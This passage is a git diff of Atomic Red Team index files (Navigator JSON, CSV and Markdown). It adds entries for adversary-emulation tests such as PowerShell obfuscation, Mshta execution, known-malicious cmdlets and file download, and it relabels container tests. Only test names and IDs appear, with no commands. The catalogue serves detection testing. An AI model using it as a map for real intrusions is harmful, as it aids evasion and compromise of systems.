ID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index f2257e0e..910ab46c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -385,6 +385,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell +defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt @@ -401,6 +402,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell +defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell @@ -798,6 +800,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh @@ -818,6 +822,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt @@ -860,6 +865,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell @@ -871,6 +877,7 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell +command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b338da52..6a11056d 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -257,6 +257,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell +defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt @@ -272,6 +273,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell +defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell @@ -528,6 +530,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell @@ -536,6 +539,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell +command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt @@ -570,6 +574,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt +execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt @@ -584,6 +590,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 21b70104..7c3a516f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -11,7 +11,7 @@ - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.007 Container API](../../T1552.007/T1552.007.md) - - Atomic Test #1: ListSecrets [macos, linux] + - Atomic Test #1: ListSecrets [containers] - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] @@ -247,8 +247,8 @@ - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) @@ -274,7 +274,7 @@ - [T1546.014 Emond](../../T1546.014/T1546.014.md) - Atomic Test #1: Persistance with Event Monitor - emond [macos] - [T1611 Escape to Host](../../T1611/T1611.md) - - Atomic Test #1: Deploy container using nsenter container escape [linux] + - Atomic Test #1: Deploy container using nsenter container escape [containers] - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -662,6 +662,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] @@ -685,6 +686,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) @@ -896,8 +898,8 @@ - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) @@ -1381,10 +1383,10 @@ - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1609 Container Administration Command](../../T1609/T1609.md) - - Atomic Test #1: ExecIntoContainer [linux, macos] + - Atomic Test #1: ExecIntoContainer [containers] - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - - Atomic Test #1: ListCronjobs [linux, macos] - - Atomic Test #2: CreateCronjob [linux, macos] + - Atomic Test #1: ListCronjobs [containers] + - Atomic Test #2: CreateCronjob [containers] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] @@ -1436,6 +1438,8 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - [T1059.006 Python](../../T1059.006/T1059.006.md) - Atomic Test #1: Execute shell script via python's command mode arguement [linux] - Atomic Test #2: Execute Python via scripts (Linux) [linux] @@ -1470,6 +1474,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] @@ -1559,6 +1564,7 @@ - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #14: whois file download [linux, macos] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] @@ -1585,6 +1591,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. [macos, linux] - Atomic Test #2: XOR Encoded data. [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 678b201a..097dc518 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -9,7 +9,7 @@ - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.007 Container API](../../T1552.007/T1552.007.md) - 